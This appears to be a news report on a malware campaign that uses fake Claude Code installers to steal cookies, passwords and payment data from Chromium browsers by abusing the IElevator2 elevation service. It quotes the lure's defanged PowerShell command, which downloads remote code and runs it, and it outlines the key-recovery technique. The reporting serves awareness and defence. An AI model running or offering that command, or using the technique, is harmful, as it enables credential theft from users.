A new campaign has been discovered that exploits vulnerabilities in Chromium-based browsers to steal developer secrets. The attackers are using fake installers and abusing the IElevator2 COM interface to gain access to sensitive information.
A recent campaign of malicious actors has been discovered, targeting developers who use Chromium-based browsers such as Google Chrome, Microsoft Edge, Brave, Vivaldi, and Opera. The attackers have been using fake installers for popular coding tools, including Claude Code, in order to steal sensitive information from these browsers.
The attacks, which began several months ago, involve the distribution of a malicious PowerShell script that mimics a legitimate installer for an attacker-controlled command. In this case, the command is “irm https[:]//claude[.]ai/install.ps1 | iex”, and the lure replaced the destination host with “irm events[.]msft23[.]com | iex”. This allows the attackers to gain access to the victim's browser data, including decrypted cookies, passwords, and payment methods.
The malicious script also abuses the IElevator2 COM interface, which is Chromium’s elevation service used to handle App-Bound Encryption (ABE), specifically for encrypting and decrypting sensitive user data like cookies and passwords. The attackers use a native AEB helper to invoke the browser's IElevator2 COM interface and recover the App-Bound Encryption key.
The payload of the malware is unique and does not match up with any documented malware family. However, it shares similarities with other stealers, including Glove Stealer, which also abuses IElevator via a helper module communicating over a named pipe.
Ontinue's security researchers published a full list of elevation-service identifiers, so developers are advised to check that out in order to stay safe from this malware. The researchers noted that behavioral rule sets that look at the native PE in isolation will see nothing actionable, highlighting the importance of detecting activity at the COM call and PowerShell layer.
The attackers are believed to be using a "small native helper acting as a single-purpose ABE oracle, with all detection-visible activity pushed into PowerShell". This orchestration model differs from Glove Stealer, which uses a different approach.
In order to avoid falling victim to this attack, developers are advised to be cautious when downloading and installing coding tools, and to always verify the authenticity of the installation process. Additionally, keeping their browser data up-to-date and using reputable security software can help protect against these types of attacks.
The Ontinue team's discovery highlights the importance of staying vigilant in the face of evolving cyber threats, particularly those targeting developers who use Chromium-based browsers.